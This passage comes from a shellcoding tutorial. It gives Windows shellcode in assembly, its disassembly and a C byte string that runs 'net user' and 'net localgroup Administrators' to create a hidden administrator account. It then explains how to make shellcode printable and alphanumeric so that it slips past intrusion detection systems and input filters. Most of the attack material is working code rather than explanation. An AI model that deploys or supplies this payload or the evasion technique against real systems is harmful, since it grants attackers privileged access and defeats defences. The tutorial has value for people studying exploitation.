G:\>arwin kernel32.dll WinExec
arwin - win32 address resolution program - by steve hanna - v.01
WinExec is located at 0x77e6fd35 in kernel32.dll

```

```;adduser.asm
[Section .text]

global _start

_start:

jmp short GetCommand

CommandReturn:
pop ebx            	;ebx now holds the handle to the string
xor eax,eax
push eax
xor eax,eax        	;for some reason the registers can be very volatile, did this just in case
mov [ebx + 89],al   	;insert the NULL character
push ebx
mov ebx,0x77e6fd35
call ebx           	;call WinExec(path,showcode)

xor eax,eax        	;zero the register again, clears winexec retval
push eax
mov ebx, 0x77e798fd
call ebx           	;call ExitProcess(0);

GetCommand:
;the N at the end of the db will be replaced with a null character
call CommandReturn

```
```steve hanna@1337b0x:~\$ nasm -f elf adduser.asm; ld -o adduser adduser.o; objdump -d adduser

Disassembly of section .text:

08048080 <_start>:
8048080:       eb 1b                   jmp    804809d

08048082 :
8048082:       5b                      pop    %ebx
8048083:       31 c0                   xor    %eax,%eax
8048085:       50                      push   %eax
8048086:       31 c0                   xor    %eax,%eax
8048088:       88 43 59                mov    %al,0x59(%ebx)
804808b:       53                      push   %ebx
804808c:       bb 35 fd e6 77          mov    \$0x77e6fd35,%ebx
8048091:       ff d3                   call   *%ebx
8048093:       31 c0                   xor    %eax,%eax
8048095:       50                      push   %eax
8048096:       bb fd 98 e7 77          mov    \$0x77e798fd,%ebx
804809b:       ff d3                   call   *%ebx

0804809d :
804809d:       e8 e0 ff ff ff          call   8048082
80480a2:       63 6d 64                arpl   %bp,0x64(%ebp)
80480a5:       2e                      cs
80480a6:       65                      gs
80480a7:       78 65                   js     804810e <getcommand+0x71>
80480a9:       20 2f                   and    %ch,(%edi)
80480ab:       63 20                   arpl   %sp,(%eax)
80480ae:       65                      gs
80480af:       74 20                   je     80480d1 <getcommand+0x34>
80480b1:       75 73                   jne    8048126 <getcommand+0x89>
80480b3:       65                      gs
80480b4:       72 20                   jb     80480d6 <getcommand+0x39>
80480b6:       55                      push   %ebp
80480b7:       53                      push   %ebx
80480b8:       45                      inc    %ebp
80480b9:       52                      push   %edx
80480ba:       4e                      dec    %esi
80480bb:       41                      inc    %ecx
80480bc:       4d                      dec    %ebp
80480bd:       45                      inc    %ebp
80480be:       20 50 41                and    %dl,0x41(%eax)
80480c1:       53                      push   %ebx
80480c2:       53                      push   %ebx
80480c3:       57                      push   %edi
80480c4:       4f                      dec    %edi
80480c5:       52                      push   %edx
80480c6:       44                      inc    %esp
80480c7:       20 2f                   and    %ch,(%edi)
80480c9:       41                      inc    %ecx
80480ca:       44                      inc    %esp
80480cb:       44                      inc    %esp
80480cc:       20 26                   and    %ah,(%esi)
80480ce:       26 20 6e 65             and    %ch,%es:0x65(%esi)
80480d2:       74 20                   je     80480f4 <getcommand+0x57>
80480d4:       6c                      insb   (%dx),%es:(%edi)
80480d5:       6f                      outsl  %ds:(%esi),(%dx)
80480d6:       63 61 6c                arpl   %sp,0x6c(%ecx)
80480d9:       67 72 6f                addr16 jb 804814b <getcommand+0xae>
80480dc:       75 70                   jne    804814e <getcommand+0xb1>
80480de:       20 41 64                and    %al,0x64(%ecx)
80480e1:       6d                      insl   (%dx),%es:(%edi)
80480e2:       69 6e 69 73 74 72 61    imul   \$0x61727473,0x69(%esi),%ebp
80480e9:       74 6f                   je     804815a <getcommand+0xbd>
80480eb:       72 73                   jb     8048160 <getcommand+0xc3>
80480ed:       20 2f                   and    %ch,(%edi)
80480ef:       41                      inc    %ecx
80480f0:       44                      inc    %esp
80480f1:       44                      inc    %esp
80480f2:       20 55 53                and    %dl,0x53(%ebp)
80480f5:       45                      inc    %ebp
80480f6:       52                      push   %edx
80480f7:       4e                      dec    %esi
80480f8:       41                      inc    %ecx
80480f9:       4d                      dec    %ebp
80480fa:       45                      inc    %ebp
80480fb:       4e                      dec    %esi
</getcommand+0xc3></getcommand+0xbd></getcommand+0xb1></getcommand+0xae></getcommand+0x57></getcommand+0x39></getcommand+0x89></getcommand+0x34></getcommand+0x71>
```

```Replace the code at the top with:
char code[] =  "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\
"\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\xe8\xe0\xff\xff\xff"\
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"\
"\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x50\x41\x53\x53\x57"\
"\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c"\
"\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73"\
"\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x55\x53\x45\x52"\
"\x4e\x41\x4d\x45\x4e";```

When this code is executed it will add a user to the system with the specified password, then adds that user to the local Administrators group. After that code is done executing, the parent process is exited by calling ExitProcess.

This section covers some more advanced topics in shellcoding. Over time I hope to add quite a bit more content here but for the time being I am very busy. If you have any specific requests for topics in this section, please do not hesitate to email me.

Printable Shellcode

The basis for this section is the fact that many Intrustion Detection Systems detect shellcode because of the non-printable characters that are common to all binary data. The IDS observes that a packet containts some binary data (with for instance a NOP sled within this binary data) and as a result may drop the packet. In addition to this, many programs filter input unless it is alpha-numeric. The motivation behind printable alpha-numeric shellcode should be quite obvious. By increasing the size of our shellcode we can implement a method in which our entire shellcode block in in printable characters. This section will differ a bit from the others presented in this paper. This section will simply demonstrate the tactic with small examples without an all encompassing final example.

Our first discussion starts with obfuscating the ever blatant NOP sled. When an IDS sees an arbitrarily long string of NOPs (0x90) it will most likely drop the packet. To get around this we observe the decrement and increment op codes:

```
OP Code        Hex       ASCII
inc eax        0x40        @
inc ebx        0x43        C
inc ecx        0x41        A
inc edx        0x42        B
dec eax        0x48        H
dec ebx        0x4B        K
dec ecx        0x49        I
dec edx        0x4A        J```

It should be pretty obvious that if we insert these operations instead of a NOP sled then the code will not affect the output. This is due to the fact that whenever we use a register in our shellcode we wither move a value into it or we xor it. Incrementing or decrementing the register before our code executes will not change the desired operation.

So, the next portion of this printable shellcode section will discuss a method for making one’s entire block of shellcode alpha-numeric— by means of some major tomfoolery. We must first discuss the few opcodes that fall in the printable ascii range (0x33 through 0x7e).

```	sub eax, 0xHEXINRANGE
push eax
pop eax
push esp
pop esp
and eax, 0xHEXINRANGE
```

Surprisingly, we can actually do whatever we want with these instructions. I did my best to keep diagrams out of this talk, but I decided to grace the world with my wonderful ASCII art. Below you can find a diagram of the basic plan for constructing the shellcode.

```	The plan works as follows:
-make space on stack for shellcode and loader
-execute loader code to construct shellcode
-use a NOP bridge to ensure that there aren't any extraneous bytes that will crash our code.
-profit
```

But now I hear you clamoring that we can’t use move nor can we subtract from esp because they don’t fall into printable characters!!! Settle down, have I got a solution for you! We will use subtract to place values into EAX, push the value to the stack, then pop it into ESP.

Now you’re wondering why I said subtract to put values into EAX, the problem is we can’t use add, and we can’t directly assign nonprintable bytes. How can we overcome this? We can use the fact that each register has only 32 bits, so if we force a wrap around, we can arbitrarily assign values to a register using only printable characters with two to three subtract instructions.

```	The log awaited ASCII diagram
1)

2)

3)
```

So, that diagram probably warrants some explanation. Basically, we take our already written shellcode, and generate two to three subtract instructions per four bytes and do the push EAX, pop ESP trick. This basically places the constructed shellcode at the end of the stack and works towards the EIP. So we construct 4 bytes at a time for the entirety of the code and then insert a small NOP bridge (indicated by @) between the builder code and the shellcode. The NOP bridge is used to word align the end of the builder code.

Example code:

```	and eax, 0x454e4f4a	;  example of how to zero out eax(unrelated)
and eax, 0x3a313035

push esp
pop eax
sub eax, 0x39393333	; construct 860 bytes of room on the stack
sub eax, 0x72727550
sub eax, 0x54545421

push eax		; save into esp
pop esp```

Oh, and I forgot to mention, the code must be inserted in reverse order and the bytes must adhere to the little endian standard.

Intel x86-64

Intel x86

ARM

Strong ARM

Super-H

MIPS

PPC

Sparc

CRISv32

Intel x86-64

Intel x86

PPC

Intel x86-64

Intel x86

MIPS

SPARC

Intel x86